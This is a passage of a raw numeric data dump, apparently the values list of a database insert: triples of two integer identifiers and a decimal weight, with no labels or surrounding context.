4626,1556280,1.07331),(4626,1556281,1.37669),(4626,1556282,1.02669),(4626,1556283,1.19),(4626,1556284,1.68),(4626,1556285,1.86662),(4626,1556286,3.17324),(4626,1556287,2.94),(4626,1556288,0.98),(4626,1556289,0.79331),(4626,1556290,0.84),(4626,1556291,5.01655),(4626,1556292,1.23669),(4626,1556293,1.14331),(4626,1556294,1.19),(4626,1556295,1.21331),(4626,1556296,1.16669),(4626,1556297,1.00331),(4626,1556298,1.07331),(4626,1556299,1.02669),(4626,1556300,1.21331),(4626,1556301,0.98),(4626,1556302,1.12),(4626,1556303,0.93338),(4626,1556304,1.21331),(4626,1556305,1.4),(4626,1556306,1.07331),(4626,1556307,1.14331),(4626,1556308,1.21331),(4626,1556309,0.42),(4626,1556310,1.12),(4626,1556311,1.35331),(4626,1556831,1.00331),(4626,1556832,1.23669),(4626,1556833,1.02669),(4626,1556834,0.91),(4917,1556834,0.91),(4626,1556835,0.98),(4626,1556836,0.91),(4626,1556837,0.98),(4626,1556838,0.88669),(4626,1556839,1.14331),(4626,1556840,0.91),(4626,1556841,1.05),(4626,1556842,0.93331),(4626,1556843,1.07331),(4626,1556844,0.23331),(4626,1556845,1.07331),(4626,1556846,1.19),(4626,1556847,0.46669),(4626,1556848,1.02669),(4626,1556849,1.28331),(4626,1556850,1.4),(4626,1556851,0.42),(4626,1556852,0.95669),(4626,1556853,1.16669),(4635,1558496,1.3334),(4635,1558497,2.8666),(4635,1558498,3.7334),(4635,1558516,1.05),(4635,1558517,0.23331),(4635,1558518,0.98),(4635,1558519,1.14331),(4669,1559010,1.00331),(4741,1559010,1.00331),(4669,1559011,1.07331),(4741,1559011,1.07331),(4669,1559042,1.05),(4741,1559042,1.05),(4669,1559043,1.23669),(4741,1559043,1.23669),(4669,1559067,0.98),(4741,1559067,0.98),(4669,1559068,1.12),(4741,1559068,1.12),(4653,1560663,2.26661),(4762,1560664,0.42),(4734,1560664,0.84),(4653,1560664,1.02),(4761,1560664,1.68),(4653,1560665,2.66339),(4653,1560666,3.23),(4658,1563137,1.27992),(4658,1563138,3.19992),(4658,1563139,3.91992),(4661,1563465,0.51331),(4664,1563639,2.43661),(4732,1563639,3.43992),(4664,1563640,2.89),(4732,1563640,4.08),(4734,1564249,0.23331),(4734,1564436,0.56),(4761,1565375,0.56),(4678,1565375,1.36),(4678,1565376,2.83339),(4678,1565377,2.94661),(4678,1565404,2.32339),(4678,1565405,2.72),(4693,1569281,1.14331),(4693,1569325,0.37331),(4693,1569326,1.14331),(4693,1569327,1.26),(4693,1569381,0.23331),(4940,1569381,0.23331),(4693,1569382,0.88669),(4940,1569382,0.88669),(4693,1569383,1.16669),(4917,1569384,0.32669),(4909,1569384,0.65338),(4934,1569384,0.79339),(4957,1569384,0.79339),(4693,1569384,1.12008),(4710,1569384,3.40691),(4762,1569384,7.84056),(4761,1569384,11.1075),(4693,1569385,1.00331),(4693,1569386,1.12),(4693,1569387,0.96),(4693,1569388,3.52008),(4693,1569389,1.16669),(4710,1585105,0.46669),(4721,1585105,0.46669),(4721,1585111,0.51331),(4710,1585111,1.02662),(4710,1585112,1.26),(4721,1585112,1.26),(4710,1585113,1.4),(4721,1585113,1.4),(4710,1592310,0.23331),(4710,1592311,1.02669),(4710,1592312,1.21331),(4710,1592313,4.54677),(4710,1592314,5.37323),(4710,1592315,0.91),(4710,1592316,1.14331),(4710,1592317,1.00331),(4710,1592318,1.28331),(4710,1592319,0.65338),(4710,1592320,1.14331),(4710,1592321,1.30669),(4710,1592322,1.09669),(4710,1592323,1.35331),(4710,1592324,0.37331),(4710,1592325,1.02669),(4710,1592326,1.30669),(4710,1592327,0.18669),(4934,1592327,0.45339),(4957,1592327,0.45339),(4710,1592328,1.02669),(4710,1592329,1.30669),(4710,1592330,0.93331),(4710,1592331,1.12),(4710,1592332,0.84),(4710,1592333,0.88669),(4710,1592334,0.56),(4710,1592335,1.21331),(4710,1592336,1.30669),(4710,1592337,0.23331),(4710,1592338,0.95669),(4710,1592339,1.16669),(4710,1592662,0.86331),(4710,1592663,0.91),(4710,1592664,0.84),(4710,1592665,1.07331),(4710,1592666,0.86331),(4710,1592667,1.07331),(4710,1592668,0.81669),(4710,1592669,0.93331),(4710,1592670,0.28),(4710,1592671,1.09669),(4710,1592672,1.28331),(4710,1592673,0.32669),(4917,1592673,0.32669),(4710,1592674,1.19),(4710,1592675,1.30669),(4710,1592676,0.95669),(4710,1592677,1.05),(4710,1592678,0.93331),(4710,1592679,1.19),(4710,1592680,1.02669),(4710,1592681,1.28331),(4710,1592682,1.09669),(4710,1592683,1.19),(4710,1592684,0.93331),(4909,1592684,0.93331),(4710,1592685,1.09669),(4710,1592686,0.91),(4710,1592687,1.05),(4710,1592688,0.95669),(4710,1592689,1.16669),(4710,1592690,0.98),(4710,1592691,1.26),(4710,1592692,1.16669),(4710,1592693,1.37669),(4710,1592694,0.46669),(4710,1592695,1.07331),(4710,1592696,1.26),(4710,1592697,0.46669),(4710,1592698,1.12),(4710,1592699,1.23669),(4710,1592700,1.14331),(4710,1592701,1.37669),(4710,1592702,0.56),(4710,1592703,1.16669),(4710,1592704,1.23669),(4710,1592705,0.46669),(4710,1592706,1.16669),(4710,1592707,1.26),(4710,1592708,0.37331),(4803,1592708,0.37331),(4710,1592709,1.16669),(4710,1592710,1.33),(4710,1592711,0.42),(4710,1592712,1.05),(4710,1592713,1.19),(4710,1592714,0.18669),(4734,1592714,0.18669),(4849,1592714,0.18669),(4710,1592715,1.05),(4710,1592716,1.23669),(4710,1592717,0.51331),(4710,1592718,1.09669),(4710,1592719,1.30669),(4710,1592720,0.42),(4710,1592721,1.19),(4710,1592722,1.4),(4710,1592723,0.42),(4710,1592724,0.98),(4710,1592725,1.21331),(4710,1592726,0.42),(4710,1592727,1.00331),(4710,1592728,1.21331),(4762,1596447,0.90661),(4734,1596447,1.11993),(4732,1596447,1.27992),(4761,1596447,1.65323),(4761,1596623,1.86662),(4732,1596623,2.26661),(4734,1596623,2.79993),(4721,1602950,0.88669),(4721,1602951,1.00331),(4721,1602952,0.91),(4721,1602953,1.07331),(4721,1602954,0.79331),(4721,1602955,0.86331),(4721,1602977,0.98),(4721,1602978,1.02669),(4721,1602979,0.23331),(4721,1602980,1.00331),(4721,1602981,1.09669),(4721,1603156,0.18669),(4721,1603157,0.93331),(4721,1603158,1.00331),(4721,1603159,0.18669),(4721,1603160,0.91),(4721,1603161,1.07331),(4721,1603162,0.28),(4721,1603163,1.05),(4721,1603164,1.14331),(4721,1603165,0.23331),(4721,1603166,1.05),(4721,1603167,1.33),(4721,1603168,0.23331),(4721,1603169,1.09669),(4721,1603170,1.19),(4721,1603171,0.46669),(4721,1603172,1.09669),(4721,1603173,1.14331),(4721,1603174,1.00331),(4721,1603175,1.05),(4721,1603176,0.91),(4721,1603177,1.16669),(4721,1603178,0.88669),(4721,1603179,1.00331),(4721,1603180,0.84),(4721,1603181,1.00331),(4721,1603182,0.88669),(4721,1603183,1.02669),(4721,1603184,0.93331),(4721,1603185,1.05),(4721,1603186,0.98),(4721,1603187,1.23669),(4721,1603188,0.23331),(4721,1603189,0.98),(4721,1603190,1.16669),(4721,1603191,0.51331),(4721,1603192,1.00331),(4721,1603193,1.21331),(4721,1603194,0.28),(4721,1603195,0.98),(4721,1603196,1.21331),(4721,1603197,0.23331),(4721,1603198,0.95669),(4721,1603199,1.02669),(4721,1603200,0.32669),(4721,1603201,1.00331),(4721,1603202,1.26),(4721,1603976,0.84),(4721,1603977,0.95669),(4721,1603978,0.81669),(4721,1603979,0.93331),(4721,1603980,1.05),(4721,1603981,1.19),(4721,1603982,1.00331),(4721,1603983,1.19),(4721,1603984,0.91),(4721,1603985,1.16669),(4721,1603986,1.09669),(4721,1603987,1.16669),(4721,1603988,0.93331),(4721,1603989,1.02669),(4721,1603990,0.91),(4721,1603991,1.14331),(4721,1603992,0.88669),(4721,1603993,1.02669),(4721,1603994,0.86331),(4721,1603995,0.93331),(4721,1603996,0.86331),(4721,1603997,1.05),(4721,1603998,0.79331),(4721,1603999,0.91),(4721,1604000,0.86331),(4721,1604001,1.02669),(4721,1604002,1.09669),(4721,1604003,1.4),(4721,1604004,0.51331),(4721,1604005,1.14331),(4721,1604006,1.30669),(4721,1604007,0.14),(4721,1604008,0.46669),(4721,1604009,1.09669),(4721,1604010,1.37669),(4721,1604011,0.28),(4721,1604012,0.93331),(4721,1604013,1.07331),(4721,1604014,0.23331),(4721,1604015,0.86331),(4721,1604016,0.93331),(4732,1613485,0.46669),(4732,1613486,1.12),(4732,1613487,1.37669),(4732,1613488,3.28008),(4732,1613489,4.15992),(4732,1613490,0.28),(4761,1613490,0.28),(4732,1613491,1.09669),(4761,1613491,1.09669),(4732,1613492,1.14331),(4732,1613660,2.43661),(4732,1613661,0.42),(4762,1613661,1.26),(4732,1613662,1.14331),(4732,1613663,1.35331),(4732,1613664,0.37331),(4732,1613665,1.00331),(4732,1613666,1.33),(4734,1615847,0.6666),(4734,1615848,2.4666),(4734,1615849,3.1334),(4734,1615939,0.98),(4734,1615940,1.09669),(4734,1615976,0.95669),(4734,1615977,1.00331),(4734,1615978,0.28),(4734,1615979,1.09669),(4734,1615980,1.14331),(4734,1616318,0.18669),(4734,1616319,0.98),(4734,1616320,1.23669),(4734,1616321,0.95669),(4734,1616322,1.02669),(4734,1616323,0.28),(4734,1616324,1.00331),(4734,1616325,1.07331),(4734,1616326,1.05),(4734,1616327,1.28331),(4734,1616328,1.00331),(4734,1616329,1.19),(4734,1616330,0.95669),(4734,1616331,1.07331),(4734,1616332,1.14331),(4761,1616332,2.77661),(4734,1616333,1.33),(4761,1616333,3.23),(4734,1616334,1.09669),(4734,1616335,1.14331),(4734,1616336,1.05),(4734,1616337,1.09669),(4734,1616338,0.51331),(4734,1616339,1.00331),(4734,1616340,1.19),(4734,1616341,0.51331),(4734,1616342,1.09669),(4734,1616343,1.26),(4734,1616344,0.32669),(4734,1616345,0.91),(4734,1616346,1.07331),(4734,1616347,0.32669),(4734,1616348,1.07331),(4734,1616349,1.30669),(4734,1616350,0.56),(4734,1616351,1.96),(4734,1616352,1.16669),(4734,1616353,1.30669),(4734,1616354,0.88669),(4734,1616355,0.98),(4734,1616356,0.93331),(4734,1616357,1.09669),(4734,1616358,1.00331),(4734,1616359,1.09669),(4734,1616360,1.02669),(4734,1616361,1.14331),(4734,1616362,0.91),(4734,1616363,1.05),(4734,1616364,0.91),(4734,1616365,1.09669),(4734,1616366,1.02669),(4734,1616367,1.19),(4734,1616368,0.95669),(4734,1616369,1.23669),(4734,1616370,1.00331),(4734,1616371,1.19),(4734,1616372,0.91),(4734,1616373,0.95669),(4734,1616374,0.88669),(4734,1616375,0.98),(4734,1616376,0.93331),(4734,1616377,1.16669),(4734,1616378,0.93331),(4734,1616379,1.07331),(4734,1616380,0.69993),(4734,1616381,0.91),(4734,1616382,1.14331),(4734,1616383,1.00331),(4734,1616384,1.07331),(4734,1616385,0.93331),(4734,1616386,1.14331),(4734,1616387,0.46669),(4734,1616388,1.16669),(4734,1616389,1.21331),(4734,1616390,0.37338),(4734,1616391,0.93331),(4734,1616392,1.07331),(4734,1616393,0.93331),(4734,1616394,0.98),(4734,1616395,0.88669),(4734,1616396,1.07331),(4734,1616397,0.28),(4734,1616398,0.95669),(4734,1616399,1.00331),(4734,1616400,0.28),(4734,1616401,0.88669),(4734,1616402,1.07331),(4734,1616403,0.18669),(4734,1616404,0.93331),(4734,1616405,1.09669),(4734,1616406,0.37331),(4734,1616407,0.93331),(4734,1616408,1.19),(4734,1616409,0.32669),(4734,1616410,1.09669),(4734,1616411,1.19),(4734,1616412,1.00331),(4734,1616413,1.07331),(4734,1616414,0.18669),(4734,1616415,1.12),(4734,1616416,1.16669),(4734,1616417,0.23331),(4734,1616418,0.91),(4734,1616419,1.07331),(4734,1616420,0.23331),(4734,1616421,0.88669),(4734,1616422,1.00331),(4734,1617573,0.81669),(4734,1617574,0.98),(4734,1617575,0.91),(4734,1617576,1.16669),(4734,1617577,0.98),(4734,1617578,1.05),(4734,1617579,1.19),(4734,1617580,1.14331),(4734,1617581,1.09669),(4734,1617582,0.91),(4734,1617583,0.95669),(4734,1617584,0.88669),(4734,1617585,1.02669),(4734,1617586,0.88669),(4734,1617587,1.00331),(4734,1617588,2.38),(4734,1617589,2.83339),(4734,1617590,2.45007),(4734,1617591,0.86331),(4734,1617592,0.95669),(4734,1617593,1.00331),(4734,1617594,0.86331),(4734,1617595,1.05),(4734,1617596,0.86331),(4734,1617597,1.00331),(4734,1617598,1.09669),(4734,1617599,1.02669),(4734,1617600,0.95669),(4734,1617601,1.19),(4734,1617602,0.84),(4734,1617603,0.95669),(4734,1617604,1.00331),(4734,1617605,1.16669),(4734,1617606,0.23331),(4734,1617607,0.91),(4734,1617608,1.19),(4734,1617609,0.42),(4734,1617610,1.05),(4734,1617611,1.19),(4734,1617612,0.60669),(4734,1617613,1.16669),(4734,1617614,1.4),(4734,1617615,0.95669),(4734,1617616,1.05),(4734,1617617,0.42),(4734,1617618,1.09669),(4734,1617619,1.19),(4734,1617620,1.07331),(4734,1617621,1.21331),(4734,1617622,0.7),(4734,1617623,1.30669),(4734,1617624,1.4),(4734,1617625,0.28),(4734,1617626,1.16669),(4734,1617627,1.30669),(4734,1617628,0.51331),(4734,1617629,1.12),(4734,1617630,1.23669),(4735,1617969,2.43661),(4735,1617970,3.06),(4917,1617971,0.88669),(4735,1617971,2.15339),(4735,1617972,2.83339),(4736,1618021,1.05),(4780,1618021,1.05),(4927,1618021,1.05),(4803,1618021,2.1),(4849,1618021,2.1),(4940,1618021,3.15),(4736,1618022,1.14331),(4780,1618022,1.14331),(4927,1618022,1.14331),(4803,1618022,2.28662),(4849,1618022,2.28662),(4940,1618022,3.42993),(4736,1618023,1.2),(4736,1618024,2.9334),(4736,1618025,3.2666),(4761,1620458,0.37331),(4762,1620458,0.74662),(4762,1620465,1.11993),(4761,1620465,2.61317),(4762,1620466,3.08007),(4761,1620466,7.18683),(4762,1620467,3.84993),(4761,1620467,8.98317),(4761,1620474,0.09331),(4762,1620474,0.18662),(4762,1620964,12.0636),(4761,1620964,23.0305),(4761,1620972,1.35331),(4762,1620972,1.35331),(4762,1620976,12.32),(4761,1620976,13.44),(4761,1621005,0.28),(4762,1621005,0.28),(4753,1623636,0.14),(4753,1623637,0.95669),(4753,1623638,1.09669),(4927,1623827,0.14),(4759,1623827,0.34),(4759,1623828,1.98339),(4759,1623829,2.38),(4761,1626558,0.56),(4761,1626559,1.26),(4761,1626560,1.4),(4761,1626561,0.32669),(4761,1626562,1.19),(4761,1626563,1.28331),(4761,1626564,0.37331),(4761,1626565,1.02669),(4761,1626566,1.28331),(4761,1626567,1.12),(4761,1626568,1.4),(4761,1626569,3.36),(4761,1626570,3.71007),(4761,1626571,1.07331),(4761,1626572,1.14331),(4761,1626573,1.02669),(4761,1626574,1.21331),(4761,1626575,1.12),(4761,1626576,1.30669),(4761,1626577,1.19),(4761,1626578,1.4),(4761,1626579,0.37331),(4761,1626580,1.14331),(4761,1626581,1.37669),(4761,1626582,0.84),(4761,1626583,2.1),(4761,1626584,2.61338),(4761,1626585,0.32669),(4761,1626586,1.12),(4761,1626587,1.37669),(4761,1626588,0.42),(4761,1626589,1.07331),(4761,1626590,1.33),(4761,1626591,1.35331),(4761,1626592,0.93331),(4761,1626593,1.02669),(4761,1626594,0.7),(4761,1626595,1.4),(4761,1626596,1.4),(4761,1626597,0.28),(4761,1626598,0.98),(4761,1626599,1.14331),(4761,1627384,1.07331),(4761,1627385,1.16669),(4761,1627386,1.07331),(4761,1627387,1.33),(4761,1627388,1.35331),(4761,1627389,1.35331),(4761,1627390,1.35331),(4761,1627391,1.35331),(4761,1627392,1.35331),(4761,1627393,1.35331),(4761,1627394,1.35331),(4761,1627395,1.35331),(4761,1627396,1.35331),(4761,1627397,1.35331),(4761,1627398,1.35331),(4761,1627399,1.35331),(4761,1627400,1.35331),(4761,1627401,1.35331),(4761,1627402,1.35331),(4761,1627403,1.35331),(4761,1627404,1.35331),(4761,1627405,1.35331),(4761,1627406,1.35331),(4761,1627407,1.35331),(4761,1627408,1.37669),(4761,1627409,1.37669),(4761,1627410,1.37669),(4761,1627411,1.37669),(4761,1627412,1.37669),(4761,1627413,1.37669),(4761,1627414,1.37669),(4761,1627415,1.37669),(4761,1627416,1.37669),(4761,1627417,1.37669),(4761,1627418,1.37669),(4761,1627419,1.37669),(4761,1627420,0.37331),(4761,1627421,1.21331),(4761,1627422,1.30669),(4761,1627423,0.32669),(4761,1627424,1.28331),(4761,1627425,1.4),(4761,1627426,0.32669),(4761,1627427,1.14331),(4761,1627428,1.30669),(4761,1627429,0.42),(4761,1627430,1.16669),(4761,1627431,1.26),(4761,1627432,1.07331),(4761,1627433,1.28331),(4761,1627434,0.93331),(4761,1627435,1.14331),(4761,1627445,1.30676),(4761,1627446,1.07331),(4761,1627447,1.30669),(4761,1627448,1.09669),(4761,1627449,1.30669),(4761,1627450,1.09669),(4761,1627451,1.4),(4761,1627452,1.09669),(4761,1627453,1.4),(4761,1627454,0.32669),(4761,1627455,1.12),(4761,1627456,1.30669),(4761,1627457,0.37338),(4761,1627458,1.12),(4761,1627459,1.37669),(4761,1627460,1.07331),(4761,1627461,1.33),(4761,1627462,0.23331),(4761,1627463,0.95669),(4761,1627464,1.21331),(4762,1628230,0.42),(4762,1628231,1.02669),(4762,1628232,1.35331),(4762,1628233,1.14331),(4762,1628234,1.30669),(4762,1628235,0.93331),(4762,1628236,1.16669),(4762,1628237,1.07331),(4762,1628238,1.28331),(4762,1628239,2.83339),(4762,1628240,3.34339),(4762,1628241,0.14),(4762,1628242,1.02669),(4762,1628243,1.16669),(4762,1628244,0.37331),(4917,1628244,0.37331),(4762,1628245,1.09669),(4762,1628246,1.23669),(4762,1628247,2.00662),(4762,1628248,2.14662),(4762,1628249,0.42),(4762,1628250,1.05),(4762,1628251,1.30669),(4762,1628252,0.32669),(4762,1628253,1.07331),(4762,1628254,1.4),(4762,1628625,1.07331),(4762,1628626,1.12),(4762,1628627,1.35331),(4762,1628628,1.35331),(4762,1628629,1.35331),(4762,1628630,1.35331),(4762,1628631,1.35331),(4762,1628632,1.35331),(4762,1628633,1.35331),(4762,1628634,1.35331),(4762,1628635,1.35331),(4762,1628636,1.35331),(4762,1628637,1.37669),(4762,1628638,1.37669),(4762,1628639,1.37669),(4762,1628640,1.37669),(4762,1628641,1.37669),(4762,1628642,1.37669),(4762,1628643,1.37669),(4762,1628644,1.37669),(4762,1628645,1.37669),(4762,1628646,1.37669),(4762,1628647,1.37669),(4762,1628648,1.35331),(4762,1628649,1.4),(4762,1628650,1.09669),(4762,1628651,1.37669),(4762,1628652,0.95669),(4762,1628653,1.00331),(4762,1628654,1.07331),(4762,1628655,1.4),(4762,1628656,0.46669),(4762,1628657,1.23669),(4762,1628658,1.37669),(4762,1628659,0.32669),(4762,1628660,1.05),(4762,1628661,1.26),(4762,1628662,0.14),(4762,1628663,0.91),(4762,1628664,1.09669),(4762,1628665,1.02669),(4762,1628666,1.07331),(4762,1628667,1.00331),(4762,1628668,1.05),(4764,1629052,1.14331),(4928,1629052,1.14331),(4951,1629052,1.14331),(4764,1629053,1.35331),(4928,1629053,1.35331),(4951,1629053,1.35331),(4764,1629054,0.56),(4928,1629054,0.56),(4951,1629054,0.56),(4764,1629055,1.19),(4928,1629055,1.19),(4951,1629055,1.19),(4764,1629056,1.4),(4928,1629056,1.4),(4951,1629056,1.4),(4839,1629098,0.37331),(4847,1629098,0.37331),(4857,1629098,0.37331),(4955,1629098,0.37331),(4771,1629238,0.68),(4777,1629384,0.98),(4777,1629385,1.05),(4777,1629464,0.98),(4777,1629465,1.02669),(4777,1629466,0.37331),(4777,1629467,1.02669),(4777,1629468,1.19),(4777,1629469,0.95669),(4777,1629470,1.09669),(4777,1629471,1.02669),(4777,1629472,1.12),(4777,1629473,0.86331),(4777,1629474,1.05),(4777,1629475,0.86331),(4777,1629476,1.12),(4777,1629477,0.84),(4803,1629477,0.84),(4777,1629478,0.98),(4777,1629479,0.32669),(4777,1629480,0.93331),(4777,1629481,1.05),(4777,1629482,1.09669),(4777,1629483,1.26),(4777,1629484,0.42),(4777,1629485,1.09669),(4777,1629486,1.23669),(4777,1629487,0.74662),(4777,1629488,1.09669),(4777,1629489,1.23669),(4777,1629490,1.02669),(4777,1629491,1.30669),(4777,1629492,0.14),(4777,1629493,0.95669),(4777,1629494,1.02669),(4777,1629755,1.00331),(4777,1629756,1.09669),(4777,1629757,0.93331),(4777,1629758,1.14331),(4777,1629759,0.88669),(4777,1629760,1.07331),(4777,1629761,0.28),(4777,1629762,0.88669),(4777,1629763,1.16669),(4777,1629764,0.23331),(4777,1629765,1.09669),(4777,1629766,1.30669),(4777,1629767,0.37331),(4777,1629768,0.98),(4777,1629769,1.09669),(4777,1629770,0.32669),(4777,1629771,0.93331),(4777,1629772,1.19),(4780,1629961,0.98),(4780,1629962,1.21331),(4798,1643154,0.9334),(4798,1643155,3.5334),(4798,1643156,4),(4798,1643278,0.37331),(4798,1643279,0.95669),(4798,1643280,1.07331),(4798,1643281,0.93331),(4798,1643282,1.26),(4798,1643283,0.84),(4798,1643284,0.93331),(4798,1643285,0.84),(4798,1643286,1.02669),(4798,1643287,0.86331),(4798,1643288,1.05),(4798,1643289,2.05338),(4798,1643290,1.09669),(4798,1643291,1.21331),(4798,1643292,0.37331),(4798,1643293,1.05),(4798,1643294,1.16669),(4798,1643295,1.05),(4798,1643296,1.28331),(4798,1643297,1.05),(4798,1643298,1.28331),(4798,1643299,1.07331),(4798,1643300,1.12),(4798,1643301,0.74662),(4798,1643302,2.19338),(4798,1643303,2.38),(4798,1643304,0.56007),(4798,1643305,0.84),(4798,1643306,1.4),(4798,1643307,1.86662),(4798,1643308,1.02669),(4798,1643309,1.02669),(4798,1643310,0.93331),(4798,1643311,0.98),(4798,1643312,1.00331),(4798,1643313,1.12),(4798,1643314,1.86662),(4798,1643315,2.52),(4798,1643316,0.18669),(4798,1643317,1.07331),(4798,1643318,1.28331),(4798,1643319,0.86331),(4798,1643320,0.95669),(4798,1643321,0.88669),(4798,1643322,1.12),(4798,1643323,0.84),(4798,1643324,0.91),(4798,1643325,0.18669),(4798,1643326,0.88669),(4798,1643327,1.00331),(4798,1643778,0.93331),(4798,1643779,0.98),(4798,1643780,0.28),(4798,1643781,1.05),(4798,1643782,1.30669),(4798,1643783,0.37331),(4798,1643784,1.07331),(4798,1643785,1.4),(4798,1643786,0.14),(4798,1643787,0.84),(4798,1643788,0.93331),(4798,1643789,1.4),(4798,1643790,0.32669),(4798,1643791,1.02669),(4798,1643792,1.12),(4798,1643793,0.28),(4798,1643794,0.93331),(4798,1643795,1.00331),(4803,1644985,0.98),(4803,1644986,0.32669),(4803,1644987,1.02669),(4803,1644988,1.16669),(4803,1644989,0.46669),(4927,1644989,0.46669),(4803,1644990,1.07331),(4803,1644991,1.4),(4803,1644992,1.02669),(4803,1644993,1.19),(4803,1645114,0.88669),(4803,1645115,1.05),(4803,1645116,0.32669),(4803,1645117,1.05),(4803,1645118,1.21331),(4803,1645119,1.09669),(4803,1645120,1.35331),(4803,1645121,0.23331),(4803,1645122,1.16669),(4803,1645123,1.4),(4804,1645181,2.09661),(4804,1645182,2.43661),(4804,1645183,0.45339),(4809,1645386,0.9334),(4813,1645526,2.09661),(4813,1645527,2.55),(4814,1645618,0.79339),(4814,1645619,2.43661),(4814,1645620,2.60661),(4837,1646517,1.4),(4837,1646526,1.16669),(4837,1646527,1.26),(4839,1646575,0.8),(4847,1646575,0.8),(4851,1646575,0.8),(4852,1646575,0.8),(4857,1646575,0.8),(4930,1646575,0.8),(4931,1646575,0.8),(4946,1646575,0.8),(4947,1646575,0.8),(4948,1646575,0.8),(4949,1646575,0.8),(4954,1646575,0.8),(4839,1646576,2.8),(4847,1646576,2.8),(4852,1646576,2.8),(4839,1646577,3.1334),(4839,1646586,1.14331),(4847,1646586,1.14331),(4839,1646587,1.23669),(4839,1646588,1.02669),(4839,1646589,1.16669),(4847,1646853,3.1334),(4847,1646861,1.4),(4847,1646862,1.19),(4849,1647063,0.91),(4849,1647064,1.14331),(4849,1647065,0.28),(4849,1647066,1.02669),(4849,1647067,1.28331),(4849,1647068,0.32669),(4849,1647069,0.98),(4849,1647070,1.05),(4849,1647071,0.88669),(4849,1647072,1.12),(4849,1647073,0.88669),(4849,1647074,1.12),(4849,1647075,0.88669),(4849,1647076,0.98),(4849,1647077,0.98),(4849,1647078,1.12),(4849,1647079,0.37331),(4849,1647080,0.95669),(4849,1647081,1.07331),(4849,1647377,1.77338),(4849,1647378,1.00331),(4849,1647379,0.95669),(4849,1647380,0.88669),(4849,1647381,1.07331),(4849,1647382,0.95669),(4849,1647383,1.07331),(4849,1647384,0.98),(4849,1647385,1.09669),(4849,1647386,0.34),(4849,1647387,2.55),(4849,1647388,2.83339),(4849,1647389,0.18669),(4849,1647390,1.05),(4849,1647391,1.14331),(4849,1647392,1.05),(4849,1647393,1.19),(4849,1647394,1.44),(4849,1647395,3.52008),(4849,1647396,2.66339),(4849,1647397,1.07331),(4851,1647974,3),(4857,1647974,3),(4930,1647974,3),(4931,1647974,3),(4851,1647975,3.3334),(4852,1648037,3.1334),(4857,1648299,3.3334),(4857,1648305,1.14331),(4857,1648306,1.4),(4909,1672253,2.32339),(4909,1672254,2.60661),(4909,1672255,0.37331),(4909,1672256,1.00331),(4909,1672257,1.19),(4909,1672258,0.90661),(4909,1672259,2.43661),(4909,1672260,3.06),(4909,1672261,0.95669),(4909,1672262,1.12),(4909,1672263,0.28),(4909,1672264,0.95669),(4909,1672265,1.09669),(4909,1672266,0.93331),(4909,1672267,1.19),(4909,1672268,0.32669),(4909,1672269,1.02669),(4909,1672270,1.21331),(4909,1672452,0.88669),(4909,1672453,1.00331),(4909,1672454,1.02669),(4909,1672455,1.09669),(4909,1672456,0.91),(4909,1672457,1.05),(4909,1672458,0.84),(4909,1672459,0.91),(4909,1672460,4.54677),(4909,1672461,1.30669),(4909,1672462,2.66339),(4909,1672463,1.19),(4909,1672464,1.00331),(4909,1672465,1.28331),(4909,1672466,1.00331),(4909,1672467,1.16669),(4909,1672468,1.07331),(4909,1672469,1.23669),(4909,1672470,1.09669),(4909,1672471,0.28),(4909,1672472,0.88669),(4909,1672473,1.12),(4917,1678892,0.98),(4917,1678893,1.02669),(4917,1678994,0.37331),(4917,1678995,0.95669),(4917,1678996,1.09669),(4917,1678997,0.18669),(4927,1678997,0.18669),(4917,1678998,0.98),(4917,1678999,1.19),(4917,1679000,0.42),(4917,1679001,1.12),(4917,1679002,1.33),(4917,1679003,0.46669),(4917,1679004,0.98),(4917,1679005,1.16669),(4917,1679006,1.05),(4917,1679007,1.23669),(4917,1679008,2.14662),(4917,1679009,1.28331),(4917,1679010,1.16669),(4917,1679011,0.95669),(4917,1679012,1.02669),(4917,1679013,0.84),(4917,1679014,0.95669),(4938,1679015,0.91),(4917,1679015,2.21),(4917,1679016,2.89),(4917,1679017,1.00331),(4917,1679018,1.14331),(4917,1679019,0.91),(4917,1679020,0.98),(4917,1679021,0.46669),(4917,1679022,1.00331),(4917,1679023,1.26),(4917,1679024,0.42),(4917,1679025,1.07331),(4917,1679026,1.14331),(4917,1679027,0.37331),(4927,1679027,0.37331),(4917,1679028,1.02669),(4917,1679029,1.33),(4917,1679030,0.42),(4917,1679031,1.14331),(4917,1679032,1.21331),(4917,1679033,0.95669),(4917,1679034,1.12),(4917,1679035,0.32669),(4917,1679036,0.28),(4917,1679037,0.98),(4917,1679038,1.05),(4917,1679306,0.98),(4917,1679307,1.21331),(4917,1679308,0.91),(4917,1679309,1.05),(4917,1679310,0.84),(4917,1679311,1.02669),(4917,1679312,0.95669),(4917,1679313,1.19),(4917,1679314,0.95669),(4917,1679315,0.98),(4917,1679316,1.12),(4917,1679317,0.91),(4917,1679318,1.23669),(4917,1679319,0.91),(4917,1679320,1.23669),(4917,1679321,1.07331),(4917,1679322,1.23669),(4917,1679323,0.95669),(4917,1679324,1.07331),(4917,1679325,0.84),(4917,1679326,2.00662),(4917,1679327,1.14331),(4917,1679328,1.30669),(4917,1679329,1.14331),(4917,1679330,0.37331),(4938,1679330,0.37331),(4917,1679331,1.21331),(4917,1679332,1.28331),(4917,1679333,0.28),(4917,1679334,0.91),(4917,1679335,0.98),(4917,1679336,0.37331),(4917,1679337,1.09669),(4917,1679338,1.16669),(4918,1679871,1.6),(4918,1679872,5.4668),(4918,1679873,6.1332),(4927,1679875,0.18669),(4918,1679875,0.45339),(4927,1682770,0.93331),(4927,1682771,1.02669),(4927,1682772,0.93331),(4927,1682773,1.09669),(4927,1682857,0.14),(4927,1682858,0.95669),(4927,1682859,1.21331),(4927,1682860,0.23331),(4927,1682861,0.95669),(4927,1682862,1.28331),(4927,1682863,0.84),(4927,1682864,1.12),(4927,1682865,0.86331),(4927,1682866,1.02669),(4927,1682867,0.93331),(4927,1682868,1.09669),(4927,1682869,0.23331),(4927,1682870,0.88669),(4927,1682871,1.12),(4927,1682872,1.05),(4927,1682873,1.28331),(4927,1682874,0.46669),(4927,1682875,1.26),(4927,1682876,1.37669),(4927,1682877,0.93331),(4927,1682878,1.19),(4927,1682879,0.86331),(4927,1682880,1.07331),(4927,1682881,0.91),(4927,1682882,1.23669),(4927,1682883,0.95669),(4927,1682884,1.07331),(4927,1682885,0.91),(4927,1682886,1.14331),(4927,1682887,1.09669),(4927,1682888,1.19),(4927,1682889,1.00331),(4927,1682890,1.33),(4927,1682891,0.28),(4927,1682892,0.91),(4927,1682893,1.21331),(4927,1682894,0.32669),(4927,1682895,0.95669),(4927,1682896,1.00331),(4927,1682897,1.16669),(4927,